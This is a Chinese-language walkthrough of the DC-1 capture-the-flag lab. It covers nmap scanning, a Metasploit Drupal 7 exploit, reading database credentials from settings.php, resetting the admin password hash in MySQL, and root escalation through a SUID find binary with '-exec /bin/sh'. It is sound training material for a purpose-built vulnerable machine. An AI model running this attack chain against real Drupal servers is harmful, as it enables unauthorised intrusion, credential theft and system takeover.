DC-1
一、环境搭建:
1、靶机描述
DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。有多种方法可以获得根,但是,我为初学者提供了一些包含线索的标志。总共有五个flag,但最终目标是在根的主目录中找到并读取标志。您甚至不需要成为根用户来执行此操作,但是,您将需要根权限。根据您的技能水平,您可以跳过寻找大多数这些标志,然后继续直。初学者可能会遇到他们以前从未遇到过的挑战,但是谷歌搜索应该是获得完成这个挑战所需的信息所必需的。
- 信息收集
1.首先使用nmap -sP 192.168.223.0/24扫描整个网段内存活的主机(网段是kali的网段每个人的网段的有所差异,根据自己的真实网段进行)
- 扫描到网段内存活的主机后,我们再次进行扫描存活主机的端口以及服务。我们使用
:nmap -A -p- -v 192.168.223.129(这里我们判断192.168.223.129疑似目标主机)
发现开放了22端口,开放了ssh服务OpenSSH 6.0p1
发现开放了80端口,存在web服务,Apache httpd 2.2.22,Drupal 7
发现开放了111端口,开放了rpcbind服务
- 访问web站点
发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS
searchsploit drupal 7
- 利用MSF渗透
-
.MSF简单命令介绍
msfconsole 进入MSF控制台
search 搜索相应模块
use 对应模块
show options 查看信息
set RHOST 远程主机ip
run 攻击
搜索drupal模块search drupal
搜索出来的漏洞有时间就一个一个试一试这是我们使用序号1
设置靶场ip(rhosts)查看配置后直接run进行攻击
- 拿下flag1.txt后我们查看他的文件里面都有些什么
这里我们使用了whoami查看了一下我是谁发现我们当前在www-data下我们紧接着cd到home查看一下却意外发现了flag4然后在此查看一下里面有什么发现里面有一个flag4.txt的文件当我们想要查看的时候显示我们需要一个配置文件
whoami ——查看我是谁
ls—— 查看
6.我们使用python反弹一个交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
7.查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件
通过查看可以发我们需要配置文件。Drupal的默认配置文件为:
(/var/www/sites/default/settings.php)
8.这是我们发现了flag2的账号密码
这是我们先进入数据库查看我们使用代码:
mysql -u dbuser -p
输入密码:R0ck3t
9.查看查找默认的Drupal user 表
(select * from users;)
发现admin信息
解决方法:置换drupal密码
10.随后进入www文件下php scripts/password-hash.sh 新密码
然后在进入数据库中把密码字段进行替换
11.登录站点
登录站点账号:admin密码是之前我们自己替换的
Admin 123
我们登录完成后随机翻一翻我们发现了flag3
这里查看发现我们需要一个配置文件
使用命令查看 suid 权限的可执行二进制程序
find / -perm -4000 2>/dev/null
发现find命令
使用命令测试,发现为root权限
touch 123
ls
find / -name 123 -exec "whoami" \;
14.发现最后的flag文件
我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。
find ./ -name 123 -exec "/bin/sh" \;
whoami
ls
cd /root
ls
查看cat thefinalflag.txt文件
cat thefinalflag.txt
- 我们用翻译软件翻译一下看一下他们给我们返回的是什么。
如果都做到了这里说明你已经掌握本次实验的内容你干的非常好!